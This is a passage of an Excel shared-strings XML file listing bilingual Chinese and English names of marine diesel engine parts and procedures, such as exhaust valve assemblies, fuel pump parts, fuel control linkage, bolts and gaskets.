    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Tightening procudure for main bolt</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓上紧力矩规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Sealing test procudure for starting air valve(In Japanese)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀密封圈测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Sealing test procudure for starting air valve(In English)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无头定位螺钉</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Welding procedure  of plug for steam hole of fuel valve</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器蒸汽阀塞焊接规程</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气阀</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧销座</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴导块</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器喷嘴</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴本体</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴钻孔部分</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Exhaust valve assembly (1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2)</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀装配图</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Exhaust valve cage (1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀壳</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Valve cage for exhaust valve (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀壳</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图层</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>帽形密封</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁定铁丝</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧垫圈</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔热说明</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀壳制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀壳材料及测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀杆制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首制件认可：材料规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温硬质合金检验</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座材料及测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Gasket 40 X 15 X 1</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Fuel oil pump assembly (1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵装配图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞套筒</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出阀</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出阀</t>
    </r>
  </si>
  <si>
    <r>
      <t>Fuel pump housing (1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵壳体</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Tack</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位钉</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧座</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧座</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背环</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Du bush 35 X 39 X 1.56</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Du bush 35 X 39 X 3.12</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘头螺钉</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵驱动机构</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Plate t22</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Plate t2.3</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Copper gasket 37 X 48 X t1</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Conical spring washer M16</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥状弹簧垫圈</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型螺栓</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Bolt M16 X 70</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Bolt M16 X 80</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>10.9 Bolts M20 X 40</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Wire φ1.6 X 3000</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表层金属</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢背</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油漆及防锈规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Bolt M24 X 108</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴驱动机构</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承工具</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主体</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Boss</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>φ80</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊座</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向手柄</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油手柄</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位开关</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动导阀</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向导阀</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向导块</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向手柄轴</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动手柄</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>沉头螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Wing bolt M8 X 15</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶形螺栓</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵手柄</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon head bolt M6×80</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Bolt M12 X 20</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pan head screw M6 X 10</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>O-ring P75</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Grease nipple pin type</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动机构</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Turning disc</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转盘</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转盘挡板</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整垫片</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分割块</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用接头</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带槽螺母</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方键</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pawl washer</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>M12</t>
    </r>
  </si>
  <si>
    <r>
      <t>Parallel pin</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6×16</t>
    </r>
  </si>
  <si>
    <r>
      <t>Wire</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>φ1.6×1000</t>
    </r>
  </si>
  <si>
    <r>
      <t>Fuel control linkage (1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油调节连接杆</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>H125×125×6.5×9-502</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>Ｌ</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Pillow type unit(UCP207)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>枕型机构</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Rod end bearing (NHS16T)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Rod end bearing (NHS16TL)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Rod end bearing(BL16BD)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Rod end bearing(BL16BDL)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁销</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>帽</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指针</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单舌垫片</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平垫圈</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Fuel control linkage assembly (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>L75 X 75 X 9 - 542L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Plat t16</t>
    <phoneticPr fontId="28"/>
